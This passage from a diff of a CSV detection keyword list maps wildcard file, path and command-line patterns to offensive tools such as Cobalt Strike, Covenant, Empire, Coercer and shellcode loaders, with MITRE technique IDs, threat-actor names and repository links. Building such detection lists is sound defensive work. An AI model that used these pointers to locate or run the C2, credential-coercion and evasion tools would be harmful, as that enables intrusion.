"*cobaltstrike_*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cobaltstrike-dist.tgz*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" -"*cobbr/Covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*cobbr/Elite*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*cobbr/Covenant*","offensive_tool_keyword","covenant","Covenant 
is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*cobbr/Elite*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*cobbr/PSAmsi*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" -"*code_execution/*.dll*","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1075","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*code_execution/*.exe*","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1135","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*code_execution/*.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1136","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*code_execution/*.dll*","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1075","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*code_execution/*.exe*","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1135","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*code_execution/*.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1136","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*CodeExec-D37DA402-3829-492F-90D0-8EC3909514EB.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*CodeLoad(shellcode)*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. 
currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","0","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*codeLoader/codeLoader.*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" 
@@ -8611,18 +8759,18 @@ "*codewatchorg/sqlipy*","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","247","102","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" "*codewhitesec/apollon*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" "*codewhitesec/daphne*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" -"*Coercer coerce*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" +"*Coercer coerce*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" "*coercer -d * -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Coercer fuzz*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*Coercer scan*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*coercer.core*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*coercer.methods*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*coercer.models*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*coercer.network*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*Coercer.py *","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*coercer.structures*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*coercer/core/loader*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*coercer_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Coercer fuzz*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*Coercer scan*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.core*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.methods*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.models*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.network*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*Coercer.py *","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.structures*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer/core/loader*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*coff_definitions.h*","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","156","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z" "*COFF_Loader.*","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","156","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z" "*COFF_PREP_BEACON*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 